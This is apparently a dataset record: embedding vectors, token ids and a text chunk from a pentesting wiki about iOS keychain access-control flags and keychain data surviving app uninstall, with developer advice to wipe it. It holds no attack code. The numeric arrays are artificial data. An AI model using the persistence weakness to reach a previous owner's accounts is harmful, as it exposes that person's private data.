-0.1519804149866104, -0.2366459220647812, 0.040620096027851105, -0.47378796339035034, -0.02867576666176319, 0.5425307154655457, -0.06841522455215454, 0.25285279750823975, 0.6483870148658752, 0.0484006293118, 0.2013973444700241, -0.055550120770931244, -1.1870887279510498, 0.8152911067008972, -0.48836585879325867, 0.22109678387641907, -0.6701270937919617, 1.474408507347107, 0.039564549922943115, 0.7455540895462036, -0.0003215367905795574, 0.38642531633377075, 0.22183886170387268, -0.2439347505569458, -0.49256035685539246, -0.2212541103363037, 0.30434730648994446, 0.23028713464736938, -0.13166488707065582, 0.17774710059165955, 1.2517017126083374, 0.5274985432624817, 0.24348117411136627, -0.3431297540664673, 0.28422343730926514, 0.8173031806945801, -0.09810417890548706, 0.20848484337329865, 0.4481716454029083, 1.1512610912322998, -0.27254727482795715, -0.06336656957864761, -0.15065254271030426, -0.559544563293457, -0.19333124160766602, -0.025277381762862206, -0.20723937451839447, 0.37000906467437744, -0.4821074604988098, 0.5841334462165833, 0.21670442819595337, -0.35983702540397644, -1.5890560150146484, -0.08594425767660141, -0.1312960833311081, -1.7201541662216187, -0.4116551876068115, -0.09692385792732239, 0.21807748079299927, 0.2667537033557892, -0.6822831630706787, -0.3003591299057007, 1.2498430013656616, 0.5939068794250488, 0.06372040510177612, 0.7064287662506104, 0.5295559167861938, -0.0039025889709591866, -0.375075101852417, -0.04680004343390465, -0.6953487992286682, -0.5092406272888184, -0.201538547873497, 0.477374792098999, -0.13410137593746185, 0.3221348822116852, -0.8295976519584656, 0.3755888044834137, 0.4509376585483551, 0.5956475734710693, -0.30814027786254883, 0.293636292219162, 0.4773026406764984, 0.4095509648323059, 0.23410382866859436, 0.1902993768453598, 0.011850749142467976, 0.9891007542610168, 0.8077977895736694, 0.7871812582015991, 0.24486133456230164, -0.3022037446498871, 0.3883371353149414, 0.12492687255144119, 0.7421448230743408, 0.4303074777126312, -0.4094943702220917, 0.4329180121421814, 0.01014177966862917, 0.2378418892621994, 0.35716211795806885, -0.5553350448608398, -0.026110216975212097, 0.3344157636165619, 0.20924235880374908, 0.25187477469444275, -0.11205582320690155, 0.3902353048324585, 0.3855434060096741, -0.010370809584856033, -0.6898311972618103, -1.1689653396606445, 0.3905082046985626, 0.7215294241905212, -1.0283777713775635, -0.20437617599964142, -0.33431723713874817, 0.16773788630962372, 0.09991481155157089, 0.14717502892017365, 0.3427262604236603, 0.5022863745689392, -0.3707098960876465, -0.051584720611572266, -0.3829154372215271, -0.5340962409973145, -0.7651097178459167, -0.6947115659713745, -0.7781850099563599, -0.35285910964012146, -0.5833621621131897, 0.12987840175628662, -0.026708465069532394, -0.5655947923660278, 0.6171591281890869, -0.9898537397384644, -0.40895092487335205, 0.10928303748369217, -0.20361585915088654, 0.6522650122642517, 0.4515974521636963, 0.39731156826019287, -0.5471429228782654, 0.325419157743454, 0.6453438997268677, 0.1146579161286354, -0.2607749104499817, -0.11567401140928268, -0.37278884649276733, -0.5477010607719421, -0.006081403698772192, -0.6615605354309082, 0.31707704067230225, -0.5296981930732727, -0.12363322824239731, -0.07149472087621689, -0.12172192335128784, 0.3704637885093689, 0.1906164288520813, -0.030783507972955704, -0.4863116443157196, 0.45635491609573364, 0.20877720415592194, -0.5180577635765076, 0.5488632321357727, 0.7555298805236816, -0.5168812870979309, 0.17222629487514496, 0.07291201502084732, 0.9167541265487671, -1.134371280670166, 0.6598083972930908, 0.7895174622535706, 0.30514925718307495, 0.37160229682922363, -0.15765151381492615, -0.12110354006290436, 0.2864976227283478, -0.29784804582595825, 0.26819097995758057, -0.5101051330566406, 0.42387115955352783, -0.08614176511764526, -0.5402743220329285, 0.3530021905899048, -0.7067844867706299, -0.7867861986160278, -0.3055897653102875, -0.45951560139656067, 0.6982808113098145, -0.45709189772605896, -0.1313546895980835, -0.12832912802696228, -0.2550230622291565, 0.5397017598152161, 0.6424078345298767, 0.07599279284477234, -0.5705158114433289, 0.2960679233074188, 0.035017482936382294, 0.072966568171978, 0.5064572095870972, 0.4805409908294678, -0.35821476578712463, -0.6675877571105957, -0.08518686145544052, 0.0011212872341275215, 0.0034185408148914576, 0.6697067022323608, 0.33088722825050354, 0.6886240839958191, 0.8441785573959351, 0.0031109009869396687, 0.054469719529151917, 0.26984086632728577, 0.5516649484634399, 0.35110941529273987, -0.1482980102300644, 0.35884156823158264, 0.22069384157657623, -0.37862274050712585, -1.2744470834732056, -0.29279014468193054, 0.5085777640342712, 0.14522048830986023, 0.49286240339279175, 0.019197236746549606, -0.3453249931335449, 0.2626775801181793, 0.9496826529502869, -0.4463439881801605, -0.5914972424507141, 0.557878851890564, 0.09906391054391861, 0.48717033863067627, -0.7254208922386169, 0.17233754694461823, -0.35611170530319214, 0.3505556583404541, 0.503879964351654, 0.4538239538669586, -0.19702047109603882, -0.5232870578765869, -0.13174961507320404, -0.27908816933631897, -0.29703277349472046, 0.3908495604991913, -0.1459832489490509, 0.6269060969352722, -0.42584750056266785, -0.6922955513000488, -0.7462664246559143, 0.13801032304763794, 0.5895016193389893, 0.29694679379463196, 0.3265526294708252, 0.7070376873016357, 0.5494152307510376, -0.3013329803943634, 0.437954306602478, -0.7119449973106384, 0.07608001679182053, -0.12453079223632812, 0.8771007657051086, 0.11142502725124359, 0.21134552359580994, -0.2540628910064697, 0.2851365804672241, -0.33020728826522827, 0.1344255805015564, -0.3850438892841339, 0.4341161251068115, -0.4201279282569885, 0.14621910452842712, 0.312328577041626, 0.8304404616355896, -0.8400173187255859, -0.21207770705223083, -0.4386117160320282, -0.3681970238685608, 1.1903033256530762, -0.613472044467926, 0.0362025648355484, -0.2683887183666229, 0.21485120058059692, -0.036817390471696854, 0.20280738174915314, -0.19959646463394165, -0.6116851568222046, -0.5142818689346313, -1.0332943201065063, 0.1382175236940384, 0.2707536220550537, 0.5264106392860413, 0.4707034230232239, -0.7633306980133057, 0.09879568964242935, 0.509171724319458, -0.20609261095523834, -0.9300222396850586, -0.050176624208688736, 0.4694482088088989, 0.2782188355922699, 0.05077812448143959, 0.028346164152026176, -0.4637296497821808, 0.3159966766834259, -0.5152286291122437, 0.545268177986145, -0.621291995048523, -0.6194959878921509, 0.017984770238399506, 0.6474160552024841, 0.11910851299762726, 0.48718684911727905, -0.40890875458717346, 0.253974586725235, 0.05310605466365814, -0.21831919252872467, -0.689405620098114, -0.4754742681980133, 0.5286131501197815, -0.046142928302288055, -0.2759225368499756, 0.41720643639564514, 0.25453829765319824, 0.06742652505636215, 0.5952792763710022, -0.3998761773109436, -0.6381324529647827, 0.3496454656124115, -0.06732119619846344, 0.5302168726921082, 0.033294904977083206, -0.024524489417672157, -0.7468745112419128, -0.5186489224433899, 1.1090829372406006, 0.23545804619789124, 0.5225613713264465, -0.5766158699989319, -0.9742987751960754, -0.08940178155899048, 0.1403888761997223, 0.022042250260710716, 0.565487802028656, -0.01593858003616333, 0.21078580617904663, -0.5438461899757385, -0.022881485521793365, -0.6848250031471252, 0.175868958234787, -1.0679296255111694, -0.09692306816577911, -0.16082192957401276, -0.21651144325733185, 0.6716225743293762, 0.09320368617773056, -0.31550031900405884, 0.880641520023346, 0.38678380846977234, 0.2697295844554901, -0.8463666439056396, -0.20021793246269226, -0.16151028871536255, 0.29093995690345764, -0.2318057119846344, 0.6146765351295471, -0.31183359026908875, -0.5756855010986328, 0.5705534815788269, 0.45331352949142456, 1.1899363994598389, 0.1118728443980217, -0.0022805877961218357, 0.5266669392585754, 0.3120444416999817, -0.724789023399353, -0.0874045342206955, 1.0027180910110474, -0.0949048176407814, -0.016933105885982513, -0.5648276209831238, -0.24516510963439941, -0.4983685314655304, -0.18252086639404297, 0.4832998514175415, -0.6025709509849548, 0.1635725200176239, -0.6463144421577454, -0.715831458568573, -0.43700748682022095, 0.4376629889011383, 0.004659607540816069, -0.6273680925369263, 0.10691603273153305, 0.041118595749139786, 0.13260412216186523, 0.36888328194618225, -0.4620939791202545, -0.13338221609592438, -0.5928089618682861, -0.7800419926643372, 0.41496771574020386, -0.30296507477760315, 0.10515061020851135, -0.06976313143968582, 0.0016904727090150118, 0.7160188555717468, 0.44669485092163086, -0.34923192858695984, -0.7375254034996033, 0.01368493027985096, 0.5301092267036438, -0.4735477566719055, 0.41377657651901245, -1.0373318195343018, 0.7585420608520508, -0.0697181224822998, 0.6755797863006592, -0.2733961343765259, 0.09408421069383621, -0.4685201942920685, 0.28177618980407715, 0.24414099752902985, -0.6535341143608093, -0.19969864189624786, -0.2513434886932373, 0.2329048216342926, 0.3787977695465088, 0.19566771388053894, -0.5331717729568481, 0.46601399779319763, -0.4056932032108307, -1.9042683839797974, 0.47161513566970825, -0.0632527768611908, 0.309047669172287, 0.4432143270969391, 0.011637444607913494, 0.6250072717666626, 0.24201855063438416, 0.3974098563194275, 0.7950814962387085, -0.15206539630889893, -0.26781415939331055, -0.37189608812332153, 0.6744022965431213, 0.10875905305147171, -0.6156550049781799, 0.4491548538208008, -0.19674865901470184, -0.13216356933116913, 0.3572693169116974, -0.4409477114677429, -0.24098007380962372, -0.5891259908676147, -0.48221415281295776, 0.5861513018608093, -0.4248032867908478, 0.6042996644973755, -0.6958288550376892, -0.6822614073753357, 0.07809411734342575, -0.037153128534555435, 0.10414087772369385, 0.7708622217178345, 0.12973570823669434, 0.2412347048521042, -0.45314109325408936, 0.050469547510147095, -0.432808518409729, 0.316074937582016, -0.6090739965438843, 0.6223434209823608, 0.32353657484054565, -0.6646885275840759, 0.9064822196960449, 0.24564282596111298, -0.377520889043808, -0.8931109309196472, -0.662004292011261, -0.1789577454328537, 0.6543785929679871, -0.47578689455986023, -0.5611522793769836, 0.1608099490404129, -0.18289996683597565, -0.11846723407506943, 0.13962511718273163, 0.3851970434188843, 0.37276598811149597, -0.8549680113792419, 0.7567570209503174, 0.09206937998533249, -0.5415827631950378, 1.0144600868225098, -0.5883351564407349, -0.09058579057455063, -0.6661197543144226, -0.07066811621189117, -0.0645202100276947, 0.2504204213619232, 0.6808310747146606, -0.18662129342556, 0.1427575945854187, -0.03240327164530754, -0.6489641070365906, 1.179802656173706, 0.33899056911468506, 0.7139838337898254, 0.7637462019920349, -0.22254151105880737, -0.814802885055542, -0.07188374549150467, 0.021567702293395996, -0.2685019075870514, -0.315304160118103, -0.8133416771888733, -0.20173408091068268, -0.3201461732387543, 0.43382588028907776, -0.8774210810661316, -0.8060553669929504, -0.7600913643836975, -0.87347012758255, -0.221867173910141, -0.11276239901781082, -0.8860896825790405, 0.15656180679798126, 0.1412641853094101, -0.23168450593948364, -0.33244627714157104, -0.5977641940116882, 0.571601152420044, -0.9865351319313049, 0.08404986560344696, -0.44215458631515503, -0.12450569868087769, -0.6670032739639282, -0.13992109894752502, -0.7204537391662598, -0.21189045906066895, -0.7462947964668274, -0.37594473361968994, -0.5213306546211243, -0.3595725893974304, -0.6373036503791809, 0.33580806851387024, -1.0808923244476318, 0.03778887540102005, -0.11451467126607895, -0.7050896883010864, 0.5571069121360779, 0.4998505413532257, -0.7282004952430725, 0.19857807457447052, 0.15647557377815247, 0.44662269949913025, 0.2909071445465088, -0.5854480862617493, 0.06081610918045044, -0.20120935142040253, 0.5510085225105286, -0.09715691208839417, 0.2538098692893982, -0.7430471181869507, 0.41756629943847656, 0.38810038566589355, -0.8579174280166626, -0.14331604540348053, -0.6359318494796753, -0.47396090626716614, -0.33286240696907043, -0.4682700037956238, -0.18874788284301758, 0.3335837721824646, 0.19072674214839935, 0.5753607153892517, -0.2867962121963501, 0.505129337310791, 0.6228231191635132, 0.2168450802564621, 0.5694399476051331, 0.042415983974933624, 0.11153028160333633, 0.10229559242725372, -0.2492751032114029, -0.008482621051371098, -0.7395533323287964, -0.009936096146702766, -0.3333389461040497, -0.2777829170227051, -0.3150166869163513, 0.0828821137547493, 0.008603970520198345, 0.1991557478904724, 0.4916749894618988, 0.10267487913370132, 0.18199466168880463, 0.36610350012779236, -0.797832727432251, -0.056426241993904114, -0.8209415674209595, -0.32251042127609253, 0.06195720657706261, -0.5320185422897339, -0.6724104285240173, -0.29541510343551636, -0.4336702227592468, 0.46050238609313965, 0.3392237722873688, 0.17583566904067993, 0.14536787569522858, -0.25043588876724243, 0.17128583788871765, 0.37509459257125854, 0.0677454024553299, 0.08482315391302109, -0.42496147751808167, 0.4764678478240967, -0.9368987083435059, -0.7469630241394043, -0.3232363164424896, 0.6839385032653809, 0.5212938189506531, 0.2339170128107071, -0.272708922624588, -0.30934861302375793, 1.0131168365478516, -0.3229599893093109, 0.20424364507198334, -0.20507988333702087, -0.8659617900848389, 1.0487169027328491, -0.9919836521148682, 0.06540743261575699, -0.23098120093345642, 0.5702580213546753, -0.24841204285621643, -0.25532272458076477, -0.7914537191390991, 0.09175268560647964, 0.23560373485088348, 0.3422755300998688, 0.35301461815834045, 0.9086765646934509, 0.09841198474168777, -0.6158725023269653, -0.12598663568496704, -0.7513028979301453, 0.8243151307106018, 0.4434533417224884, -0.151481032371521, -0.2312418818473816, 0.38828974962234497, 0.533004641532898, -0.23614858090877533, -0.25643807649612427, 0.3198640048503876, -0.03549021854996681, -0.1788981705904007, 0.334879994392395, 0.07771365344524384, -0.12308109551668167, -0.10992815345525742, -0.15916983783245087, 0.10803196579217911, -0.049350012093782425, 0.06529112905263901, -0.08702226728200912, 0.0055553060956299305, 1.0682520866394043, -0.4001491963863373, 0.4854053556919098, -0.19968484342098236, -0.03454319015145302, 0.465791255235672, -0.2568970322608948, -1.0400606393814087, 0.040960025042295456, 0.7638525366783142, 1.056167483329773, 0.011685634031891823, 0.9532381296157837, -0.242733895778656, -0.1377951055765152, -0.04952026531100273, -0.03097328543663025, -0.26592934131622314, 0.2383427619934082, 0.07991849631071091, -0.46232980489730835, -0.7491171956062317, 0.16948024928569794, 0.05179746076464653, 0.13489237427711487, 0.23984363675117493, 0.32798370718955994, 0.2978329062461853, -0.33202290534973145, 0.3645564913749695, -0.4717249572277069, 0.22460275888442993, 0.5019679069519043, -0.23149289190769196, -1.3847532272338867, 0.3742622435092926, -0.625950276851654, 0.2814616560935974, 0.32697492837905884, 0.7597001194953918, -0.043561901897192, 0.8766835331916809, -0.2614825665950775, -0.7978570461273193, -0.32746753096580505, 0.3628618121147156, -0.08049388229846954, -0.1330718696117401, -0.2707701623439789, 0.048361048102378845, 0.07980788499116898, -0.01562162023037672, -0.2626276910305023, -0.36819833517074585, 0.013645974919199944, 0.39987942576408386, -0.8084111213684082, 0.28979048132896423, 0.04165502265095711, -0.8246096968650818, -0.054737113416194916, 0.2702843248844147, 0.2520773112773895, 0.13082461059093475, -0.8492312431335449, -0.515082836151123, -0.3408491015434265, -0.5767397880554199, -0.4526815116405487, 0.7466762661933899, -0.8358196020126343, -0.7541264295578003, -0.952465832233429, -0.7862498760223389, -0.3111914396286011, 0.47411030530929565, -1.0901261568069458, -0.5566155910491943, 0.8806098103523254, 0.31431666016578674, 0.7437408566474915, 0.22860583662986755, -0.2511451840400696, 0.0215718112885952, -0.05563804507255554, 0.6379988789558411, -0.6069844365119934, 0.8538925647735596, 0.14897088706493378, 0.18297062814235687, 0.7121556401252747, 0.12270163744688034, 0.5073667764663696, -0.6899734735488892, -0.1487738937139511, -0.3959023356437683, -0.08450018614530563, -0.42683085799217224, 0.017019178718328476, -0.05843815952539444, 0.15695253014564514, -0.4330439567565918, -0.4860789477825165, -0.3291035592556, -0.21681512892246246, -0.3281203508377075, 0.5155513286590576, -0.12366797029972076, 0.2664104104042053, -0.3802635073661804, -0.050471216440200806, 0.7535797953605652, -1.2816336154937744, 4.341612815856934, 1.1507914066314697, 0.23673631250858307, -0.04602033644914627, 0.027415713295340538, 0.5963443517684937, 0.9432305097579956, -1.182246208190918, -0.6548194289207458, -0.5176538228988647, -0.4461115300655365, -0.3852747678756714, 0.05983852967619896, 0.013770203106105328, 0.43110042810440063, 0.22645893692970276, -0.32503068447113037, 0.6742317080497742, 0.2760632038116455, -0.8383803963661194, -0.5662049055099487, 0.3166326582431793, -0.2612031102180481, 0.9316098690032959, 0.41749924421310425, 0.413306325674057, 0.35592278838157654, -0.5119327902793884, -0.5836405754089355, 0.008439560420811176, 0.21229149401187897, -0.7450082302093506, 0.5780852437019348, -0.16737359762191772, -0.9148299098014832, 0.7289377450942993, 0.27650561928749084, -0.8546456694602966, -0.29518380761146545, -0.34591904282569885, 0.7153664231300354, 0.008797894231975079, 0.0611804723739624, -0.5766409635543823, -0.09355374425649643, 0.7779238224029541, -0.6977705359458923, 0.9399532675743103, 0.9543502926826477, -0.6447877883911133, 0.6473409533500671, 0.14042805135250092, 0.362848699092865, -0.36893969774246216, -0.6184226274490356, 0.5476183891296387, 0.08429794013500214, -0.6285681128501892, 0.4353180229663849, 0.15230251848697662, 0.15011876821517944, 0.11637691408395767, 0.062107108533382416, -0.8531997203826904, -0.3552315831184387, 0.158676877617836, -0.16132894158363342, 1.0455267429351807, 0.030648741871118546, -0.14483191072940826, -0.568333625793457, -0.8638575673103333, -0.7370989322662354, 0.32328206300735474, 0.5279269218444824, 0.23096361756324768, 0.19261091947555542, 0.19978658854961395, 0.017658963799476624, -0.5651721954345703, -0.19812501966953278, -0.511996328830719, -0.3811393678188324, -0.21605974435806274, 0.7465920448303223, 0.7796695232391357, 0.40612488985061646, -0.6471015810966492, 0.11611132323741913, 0.36781349778175354, 0.8558651208877563, 0.4490639269351959, -0.39144378900527954, -0.19364692270755768, 0.1910989135503769 ]
[ 3971, 2000, 3046, 2000, 28939, 2023, 20786, 2003, 23642, 1996, 4372, 26775, 22571, 3064, 3145, 1998, 28939, 1996, 3413, 16044, 1009, 5474, 1006, 1996, 1052, 2497, 2243, 20952, 2475, 3853, 3594, 2012, 2560, 6694, 2692, 27758, 2015, 1007, 1012, 2030, 2667, 2000, 28939, 2503, 1996, 5080, 2000, 26777, 28939, 2075, 1996, 5474, 1010, 2174, 1010, 5851, 25867, 21312, 2045, 2003, 2012, 2560, 1037, 1019, 2015, 8536, 2090, 1016, 3478, 20786, 4740, 1012, 2017, 2064, 9530, 8873, 27390, 2063, 2951, 3860, 2005, 3145, 24925, 2078, 5167, 2011, 4292, 1996, 29535, 19281, 4779, 22648, 9623, 19307, 3145, 1999, 1996, 2655, 2000, 10819, 4221, 25666, 2094, 2030, 10819, 4221, 12274, 17299, 3686, 1012, 1996, 2206, 9530, 8873, 27390, 3085, 23661, 5300, 2005, 29535, 19281, 4779, 22648, 9623, 19307, 2024, 1996, 3145, 24925, 2078, 2951, 3860, 4280, 1024, 29535, 19281, 4779, 22648, 9623, 19307, 2389, 14035, 1024, 1996, 2951, 1999, 1996, 3145, 24925, 2078, 8875, 2064, 2467, 2022, 11570, 1010, 7539, 1997, 3251, 1996, 5080, 2003, 5299, 1012, 29535, 19281, 4779, 22648, 9623, 19307, 2389, 14035, 15222, 16150, 17726, 10242, 2135, 1024, 1996, 2951, 1999, 1996, 3145, 24925, 2078, 8875, 2064, 2467, 2022, 11570, 1010, 7539, 1997, 3251, 1996, 5080, 2003, 5299, 1012, 1996, 2951, 2180, 1005, 1056, 2022, 2443, 1999, 2019, 24582, 23743, 2094, 2030, 2334, 10200, 1012, 29535, 19281, 4779, 22648, 9623, 19307, 10354, 3334, 8873, 12096, 4609, 7878, 1024, 1996, 2951, 1999, 1996, 3145, 24925, 2078, 8875, 2064, 1005, 1056, 2022, 11570, 2044, 1037, 23818, 2127, 1996, 5080, 2038, 2042, 14058, 2320, 2011, 1996, 5310, 1012, 29535, 19281, 4779, 22648, 9623, 19307, 10354, 3334, 8873, 12096, 4609, 7878, 15222, 16150, 17726, 10242, 2135, 1024, 1996, 2951, 1999, 1996, 3145, 24925, 2078, 8875, 2064, 1005, 1056, 2022, 11570, 2044, 1037, 23818, 2127, 1996, 5080, 2038, 2042, 14058, 2320, 2011, 1996, 5310, 1012, 5167, 2007, 2023, 17961, 2079, 2025, 22806, 2000, 1037, 2047, 5080, 1012, 2947, 1010, 2044, 16487, 2013, 1037, 10200, 1997, 1037, 2367, 5080, 1010, 2122, 5167, 2097, 2025, 2022, 2556, 1012, 29535, 19281, 4779, 22648, 9623, 19307, 2860, 10222, 4609, 7878, 2098, 1024, 1996, 2951, 1999, 1996, 3145, 24925, 2078, 8875, 2064, 2022, 11570, 2069, 2096, 1996, 5080, 2003, 14058, 2011, 1996, 5310, 1012, 29535, 19281, 4779, 22648, 9623, 19307, 2860, 10222, 4609, 7878, 2098, 15222, 16150, 17726, 10242, 2135, 1024, 1996, 2951, 1999, 1996, 3145, 24925, 2078, 8875, 2064, 2022, 11570, 2069, 2096, 1996, 5080, 2003, 14058, 2011, 1996, 5310, 1012, 1996, 2951, 2180, 1005, 1056, 2022, 2443, 1999, 2019, 24582, 23743, 2094, 2030, 2334, 10200, 1012, 29535, 19281, 4779, 22648, 9623, 19307, 2860, 10222, 15194, 23237, 6582, 24158, 24844, 6610, 2239, 2135, 1024, 1996, 2951, 1999, 1996, 3145, 24925, 2078, 2064, 2022, 11570, 2069, 2043, 1996, 5080, 2003, 14058, 1012, 2023, 3860, 2465, 2003, 2069, 2800, 2065, 1037, 3413, 16044, 2003, 2275, 2006, 1996, 5080, 1012, 1996, 2951, 2180, 1005, 1056, 2022, 2443, 1999, 2019, 24582, 23743, 2094, 2030, 2334, 10200, 1012, 3229, 8663, 13181, 10270, 17802, 2015, 9375, 1996, 10595, 2007, 2029, 5198, 2064, 14469, 3686, 1996, 3145, 1006, 10819, 6305, 9623, 9363, 3372, 13153, 16748, 3686, 10258, 26454 ]
hack_tricks
430.txt
2
) : ksecaccesscontroldevicepasscode : access the item via a passcode. ksecaccesscontrolbiometryany : access the item via one of the fingerprints registered to touch id. adding or removing a fingerprint won't invalidate the item. ksecaccesscontrolbiometrycurrentset : access the item via one of the fingerprints registered to touch id. adding or removing a fingerprint will invalidate the item. ksecaccesscontroluserpresence : access the item via either one of the registered fingerprints ( using touch id ) or default to the passcode. please note that keys secured by touch id ( via ksecaccesscontrolbiometryany or ksecaccesscontrolbiometrycurrentset ) are protected by the secure enclave : the keychain holds a token only, not the actual key. the key resides in the secure enclave. the iphone uses the passcode introduced by the user unlocking the device to decrypt the secrets in the keychain. ios uses the appidentifierprefix ( team id ) and the bundleidentifier ( provided by the dev ) to enforce access control oven keychain items. then, the same team can configure 2 apps to share keychain items. when a backup process is initiated the keychain data backed up remains encrypted and the keychain password isn't included in the backup. in a jailbroken device the keychain isn't protected. keychain data persistenceon ios, when an application is uninstalled, the keychain data used by the application is retained by the device, unlike the data stored by the application sandbox which is wiped. in the event that a user sells their device without performing a factory reset, the buyer of the device may be able to gain access to the previous user's application accounts and data by reinstalling the same applications used by the previous user. this would require no technical ability to perform. there's no ios api that developers can use to force wipe data when an application is uninstalled. instead, developers should take the following steps to prevent keychain data from persisting between application installations : when an application is first launched after installation, wipe all keychain data associated with the application. this will prevent a device's second user from accidentally gaining access to the previous
[ -0.01492762379348278, -0.1558309942483902, -0.04023048281669617, 0.5681652426719666, -0.1321030706167221, -0.06865350902080536, 0.09195265173912048, 0.32186898589134216, -0.03304937481880188, 0.9787867665290833, -0.050004713237285614, 0.2735118269920349, -0.45123162865638733, -0.5378382802009583, -0.9190395474433899, -0.41952234506607056, -0.13310375809669495, -0.0505310520529747, -0.15837347507476807, 0.20377427339553833, 0.5536613464355469, 0.20593880116939545, -0.6368528008460999, -0.9782398343086243, 0.07950519770383835, 0.5621702671051025, 0.21694396436214447, -0.16280969977378845, 0.32227572798728943, 1.1068533658981323, -0.3618695139884949, 0.1894882321357727, 0.28438785672187805, -0.3150128722190857, 0.1579449474811554, -0.44453659653663635, 0.9318274259567261, -0.690592348575592, -0.001618747366592288, -0.5462530255317688, 0.33053433895111084, 0.5034276247024536, 0.3101557791233063, 0.12931379675865173, -0.40360331535339355, -0.48170286417007446, 0.027083443477749825, -0.22654370963573456, -0.006075876299291849, -0.11284533143043518, 0.3009547293186188, -0.06017264723777771, 0.0986613854765892, -0.17478744685649872, 0.15720783174037933, -0.018922872841358185, 0.2604726254940033, -0.601991593837738, -0.2003983110189438, 0.19200757145881653, -0.26708438992500305, 0.4549925923347473, 0.13247886300086975, -0.5960694551467896, 0.08105836063623428, 0.18662762641906738, 0.23771119117736816, -0.8549488186836243, -0.362402081489563, -0.8870431184768677, -0.035337503999471664, 0.7376682758331299, -0.2864822745323181, -0.8666573762893677, -0.6576710343360901, -0.49998238682746887, -0.38917452096939087, -0.07321956753730774, -0.20221510529518127, 0.42272916436195374, 0.07708311825990677, 0.5165503621101379, 0.1366690993309021, -0.15115782618522644, -0.19470936059951782, 0.5149782299995422, 0.32651662826538086, 0.6115372180938721, -0.4495049715042114, -0.09934061020612717, -0.22074143588542938, 0.46110019087791443, -0.7905795574188232, -0.6901606917381287, 0.8660489916801453, 0.7896945476531982, 0.031802769750356674, -0.21163591742515564, 0.21442967653274536, -0.3326360285282135, 0.07500927895307541, 0.009873924776911736, -0.2540126442909241, 0.8814719319343567, 0.3279564082622528, 0.9425950050354004, 0.35332760214805603, -0.5349307656288147, -0.6333589553833008, -0.5470998287200928, -0.06877318024635315, -0.5049067735671997, 0.3188677132129669, -0.8021873831748962, -0.25247126817703247, 0.535620927810669, 0.7934811115264893, 0.27640822529792786, -0.1357881724834442, 0.9468948245048523, 0.3733045756816864, -0.1661219447851181, 0.7516975998878479, 0.17161497473716736, 0.02323121391236782, 0.006280732341110706, 1.1665980815887451, 0.20247608423233032, -0.7995307445526123, -0.38154229521751404, -0.1262797713279724, -0.11381494998931885, -0.4109291434288025, 0.9731458425521851, -0.5025022625923157, 0.3799009919166565, -0.056780729442834854, 0.5330832600593567, 0.40375828742980957, -0.5684598684310913, -0.16748397052288055, 0.8803790807723999, 0.011694460175931454, 0.8430193662643433, -0.028354912996292114, -0.47810304164886475, -0.5025278925895691, -0.5237329006195068, -1.119096040725708, -0.342549592256546, 0.16182027757167816, 0.3078038990497589, 0.10756678879261017, -0.05901746079325676, -0.09251729398965836, -0.522611677646637, -0.715311586856842, 0.40687817335128784, -0.11788854002952576, -0.05253344774246216, -0.2829381823539734, 0.8100823760032654, 0.5373418927192688, 0.6122187376022339, -0.34547704458236694, 0.17151369154453278, -0.3162357807159424, -0.6938819885253906, -0.23115557432174683, 0.3513016998767853, 0.40221402049064636, 0.12479501962661743, 0.09262701123952866, 0.18474526703357697, 0.53399658203125, 0.9204189777374268, 0.5189388394355774, -0.12284447252750397, 0.5020596385002136, 0.28302544355392456, 0.04389451816678047, -0.12189480662345886, 0.290519654750824, 1.6278645992279053, -0.08787912130355835, 0.04285519942641258, -0.3535791337490082, -0.6953175067901611, -0.2699700891971588, -0.30099910497665405, -0.5413788557052612, 0.6744235157966614, -0.6930931210517883, 0.7897010445594788, 0.4013606607913971, -0.08188892155885696, -0.7521876692771912, -0.3620855510234833, 0.1200309544801712, -1.74356210231781, -0.6951022744178772, 0.741063117980957, 0.4174947738647461, 0.5464738607406616, 0.07159784436225891, -0.13095200061798096, 1.2282708883285522, 0.6745677590370178, -0.3160170018672943, 0.7265059351921082, 0.4438813626766205, -0.19244670867919922, -0.6559366583824158, -0.16768094897270203, 0.22945640981197357, 0.0235365629196167, -0.3461102843284607, 0.8318052291870117, -0.35798379778862, 0.16312658786773682, -0.3669266700744629, 0.7499400973320007, 0.5052108764648438, 0.13765743374824524, -0.4547934830188751, -0.5337184071540833, 0.001183744752779603, 0.5232949256896973, 0.14113159477710724, 0.18878275156021118, 0.0618426539003849, 0.81779545545578, 0.0637991800904274, 1.0685430765151978, 0.4302813708782196, 0.2694612741470337, -0.43575698137283325, 0.14552585780620575, 0.12481711059808731, -0.2419268786907196, -0.5302188992500305, 0.364328533411026, 0.4458879828453064, 0.06776807457208633, 0.4562205672264099, -0.06533463299274445, 0.17191025614738464, 0.05959828197956085, 0.815920352935791, 0.6167064905166626, 0.2328023910522461, 0.7250411510467529, 0.3241814076900482, 0.09042052179574966, -0.42298948764801025, -0.43266013264656067, 1.1108509302139282, 0.7652146220207214, -0.9219182133674622, -0.7152588963508606, 0.13983693718910217, 0.4406796991825104, 0.3324137330055237, 0.04883956164121628, 0.3223353922367096, 0.6492040157318115, 0.2091429978609085, 0.3672854006290436, -0.6526959538459778, -0.5315491557121277, -0.7899864315986633, -0.6291245222091675, -0.5694026947021484, -0.5121359825134277, -0.6357455253601074, 0.21603424847126007, 0.2766019403934479, -0.10774418711662292, 0.9215362071990967, -1.4940229654312134, -0.0018807591404765844, -0.05325523391366005, -0.0920180231332779, 0.8290385603904724, 0.06405848264694214, 0.455524206161499, -0.5716602206230164, 0.562215268611908, 0.2040654420852661, 0.3324643075466156, -0.7594505548477173, 0.10979150980710983, -0.14975334703922272, -0.2543286681175232, -0.1894761025905609, -0.721480131149292, 0.6120424866676331, 0.6807741522789001, -1.0162513256072998, 0.32145261764526367, 0.379978746175766, 0.12069694697856903, -0.44732674956321716, 0.03301790729165077, -0.29661133885383606, 0.4862302243709564, 0.07456303387880325, -0.43823328614234924, 1.0240665674209595, 0.45810678601264954, -0.7904419898986816, 0.36185142397880554, 0.6582332849502563, 0.15272213518619537, -0.9134388566017151, 0.460611492395401, 0.6107970476150513, -0.008238802663981915, 0.4756488800048828, 0.0810159370303154, -0.6773834228515625, -0.24988529086112976, -0.39201927185058594, 0.09725017100572586, -0.010231301188468933, 0.20054256916046143, -0.2811237871646881, -1.1231746673583984, 0.4324551820755005, -0.7009986639022827, -0.48647794127464294, -0.3053012788295746, 0.18098895251750946, 0.6804561614990234, 0.20920857787132263, 0.041455063968896866, 0.6470533013343811, -0.18176430463790894, 0.4723455607891083, 0.4931555986404419, -0.16047821938991547, -0.5555087327957153, 0.5814523696899414, -0.48044928908348083, -0.3527211546897888, 0.5404238104820251, -0.0006678513018414378, -0.3438751995563507, -0.8453619480133057, -0.358522891998291, -0.5182980298995972, 0.15897944569587708, 